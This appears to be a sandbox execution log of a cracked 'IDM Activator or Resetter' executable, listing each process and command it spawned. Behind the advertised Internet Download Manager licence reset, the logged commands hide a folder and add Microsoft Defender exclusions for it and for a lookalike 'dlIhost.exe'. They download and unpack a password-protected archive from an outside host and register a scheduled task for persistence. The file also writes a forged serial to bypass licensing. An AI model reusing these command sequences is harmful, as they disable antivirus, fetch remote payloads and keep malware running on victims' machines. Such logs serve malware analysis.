powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Red"' -fore '"white"' '"IDM [Internet Download Manager] is not Installed."'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\reg.exe

reg export HKCU\Software\Classes\Wow6432Node\CLSID "C:\Windows\Temp\_Backup_HKCU_CLSID_20240414-022842780.reg"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "FName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Email"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Serial"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "scansk"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "tvfrdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "radxcnt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LstCheck"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "ptrk_scdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LastCheckQU"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$sid = 'S-1-5-21-3452737119-3959686427-228443150-1000'; $HKCUsync = 1; $lockKey = $null; $deleteKey = 1; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"

C:\Windows\System32\reg.exe

reg add "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /v "AdvIntDriverEnabled2" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"DarkGreen"' -fore '"white"' '"The IDM reset process has been completed."'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.internetdownloadmanager.com/download.html

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1640 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\idman642build7.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\idman642build7.exe"

C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp

"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Program Files (x86)\Internet Download Manager\idmBroker.exe

"C:\Program Files (x86)\Internet Download Manager\idmBroker.exe" -RegServer

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /rtr

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.internetdownloadmanager.com/support/installffextfrommozillasite.html

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.internetdownloadmanager.com/support/installffextfrommozillasite.html

C:\Program Files (x86)\Internet Download Manager\Uninstall.exe

"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv

C:\Windows\system32\RUNDLL32.EXE

"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.0.551583416\1589057045" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1092 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1fd3bc3-22e9-4c7c-b821-bc6fa97fd139} 644 "\\.\pipe\gecko-crash-server-pipe.644" 1284 105f9058 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.1.2104602082\505889130" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21610 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eabab67d-0a52-47a3-bb58-cebed462a591} 644 "\\.\pipe\gecko-crash-server-pipe.644" 1564 f4eb258 socket

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.2.827980771\1027120691" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21648 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64ca4cc2-bd3c-4c8b-b564-007f2870b2ea} 644 "\\.\pipe\gecko-crash-server-pipe.644" 2000 18974b58 tab

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\net.exe

"C:\Windows\System32\net.exe" start IDMWFP

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start IDMWFP

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.3.1001450690\1901238302" -childID 2 -isForBrowser -prefsHandle 2680 -prefMapHandle 2676 -prefsLen 26046 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {582281e5-7dde-4a98-9dfa-83d369eb85bc} 644 "\\.\pipe\gecko-crash-server-pipe.644" 2696 d61658 tab

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.4.1946641119\166678601" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3548 -prefsLen 26170 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1798b114-7621-4d53-be93-528db96602b6} 644 "\\.\pipe\gecko-crash-server-pipe.644" 3700 1fe63058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.5.1560452423\30358125" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3804 -prefsLen 26170 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {564b8f2c-1a91-4cc5-b5a6-595861e02dc0} 644 "\\.\pipe\gecko-crash-server-pipe.644" 3788 1fe62a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.6.16405718\1781117987" -childID 5 -isForBrowser -prefsHandle 3964 -prefMapHandle 3968 -prefsLen 26170 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3976f00-f5aa-41c6-90e0-8137e667e057} 644 "\\.\pipe\gecko-crash-server-pipe.644" 3952 1fe63358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.7.723266685\659558384" -childID 6 -isForBrowser -prefsHandle 3964 -prefMapHandle 3968 -prefsLen 26251 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ff7eef3-2f29-42d2-bfb5-baace18a2f3a} 644 "\\.\pipe\gecko-crash-server-pipe.644" 3852 2049a258 tab

C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe

"C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe"

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" -Embedding

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe

"C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe" -runcm

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files (x86)\Internet Download Manager\Uninstall.exe

"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv

C:\Windows\system32\RUNDLL32.EXE

"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\net.exe

"C:\Windows\System32\net.exe" start IDMWFP

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start IDMWFP

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe

"C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe"

C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe

"C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe" "C:\Program Files (x86)\Internet Download Manager\IDMMsgHostMoz.json" [email protected]

C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe

"C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe" "C:\Program Files (x86)\Internet Download Manager\IDMMsgHostMoz.json" [email protected]

C:\Users\Admin\Desktop\IDM 6.xx Activator or Resetter v3.3.exe

"C:\Users\Admin\Desktop\IDM 6.xx Activator or Resetter v3.3.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\main.bat" "

C:\Windows\SysWOW64\attrib.exe

ATTRIB -S +H .

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa IDM0.bat

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa IDM.bat

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa NSudo86x.exe

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa AB2EF.exe

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa UpdateTask.xml

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM0.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" "

C:\Windows\SysWOW64\reg.exe

REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden"

C:\Windows\SysWOW64\find.exe

FIND /I "1"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" r1"

C:\Windows\SysWOW64\reg.exe

REG QUERY "HKLM\Hardware\Description\System\CentralProcessor\0"

C:\Windows\SysWOW64\find.exe

FIND /I "x86"

C:\Windows\SysWOW64\attrib.exe

ATTRIB +S +H "C:\Users\Admin\AppData\Roaming\DLL"

C:\Windows\System32\sc.exe

sc query Null

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\findstr.exe

findstr /v "$" "IDM.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"

C:\Windows\System32\find.exe

find /i "FullLanguage"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DLL" -Force

C:\Windows\System32\fltMC.exe

fltmc

C:\Windows\System32\reg.exe

reg query HKCU\Console /v QuickEdit

C:\Windows\System32\find.exe

find /i "0x0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property CreationClassName"

C:\Windows\System32\find.exe

find /i "computersystem"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "dlIhost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "NSudo86x.exe" -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "7za.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command "Invoke-WebRequest 'https://www.crackingcity.com/VScan/dlIhost.7z' -OutFile 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z'"

C:\Windows\System32\reg.exe

reg query HKU\\Software

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid"

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software

C:\Windows\System32\reg.exe

reg delete HKCU\IAS_TEST /f

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST /f

C:\Windows\System32\reg.exe

reg add HKCU\IAS_TEST

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST

C:\Windows\System32\reg.exe

reg delete HKCU\IAS_TEST /f

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v ExePath 2>nul

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v ExePath

C:\Windows\System32\reg.exe

reg add HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST /f

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command "(New-Object System.Net.WebClient).DownloadFile('https://www.crackingcity.com/VScan/dlIhost.7z', 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 1 internetdownloadmanager.com

C:\Windows\System32\PING.EXE

ping -n 1 internetdownloadmanager.com

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v idmvers 2>nul

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v idmvers

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\System32\taskkill.exe

taskkill /f /im idman.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\reg.exe

reg export HKCU\Software\Classes\Wow6432Node\CLSID "C:\Windows\Temp\_Backup_HKCU_CLSID_20240414-023017622.reg"

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e "C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z" -o"C:\Users\Admin\AppData\Roaming\DLL" -pun#912345678@rar -aoa

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "FName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Email"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Serial"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "scansk"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "tvfrdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "radxcnt"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "radxcnt" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LstCheck"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "LstCheck" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "ptrk_scdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LastCheckQU"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager"

C:\Windows\System32\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /f

C:\Windows\System32\reg.exe

reg add "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /v "AdvIntDriverEnabled2" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$sid = 'S-1-5-21-3452737119-3959686427-228443150-1000'; $HKCUsync = 1; $lockKey = 1; $deleteKey = $null; $toggle = 1; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /xml ".\UpdateTask.xml" /tn "UpdateTask" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "$key = -join ((Get-Random -Count 20 -InputObject ([char[]]('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'))));$key = ($key.Substring(0, 5) + '-' + $key.Substring(5, 5) + '-' + $key.Substring(10, 5) + '-' + $key.Substring(15, 5) + $key.Substring(20));Write-Output $key" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$key = -join ((Get-Random -Count 20 -InputObject ([char[]]('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'))));$key = ($key.Substring(0, 5) + '-' + $key.Substring(5, 5) + '-' + $key.Substring(10, 5) + '-' + $key.Substring(15, 5) + $key.Substring(20));Write-Output $key"

C:\Windows\System32\reg.exe

reg add HKCU\SOFTWARE\DownloadManager /v FName /t REG_SZ /d "9906"

C:\Windows\System32\reg.exe

reg add HKCU\SOFTWARE\DownloadManager /v LName /t REG_SZ /d "10777"

C:\Windows\System32\reg.exe

reg add HKCU\SOFTWARE\DownloadManager /v Email /t REG_SZ /d "[email protected]"

C:\Windows\System32\reg.exe

reg add HKCU\SOFTWARE\DownloadManager /v Serial /t REG_SZ /d "XBA9T-Q7R81-CG6UO-NVDY4"

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/images/idm_box_min.png" /p "C:\Windows\Temp" /f temp.png

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe

"C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe" -runcm

C:\Program Files (x86)\Internet Download Manager\Uninstall.exe

"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv

C:\Windows\system32\RUNDLL32.EXE

"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\net.exe

"C:\Windows\System32\net.exe" start IDMWFP

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start IDMWFP

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe

"C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe"

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\SysWOW64\regsvr32.exe

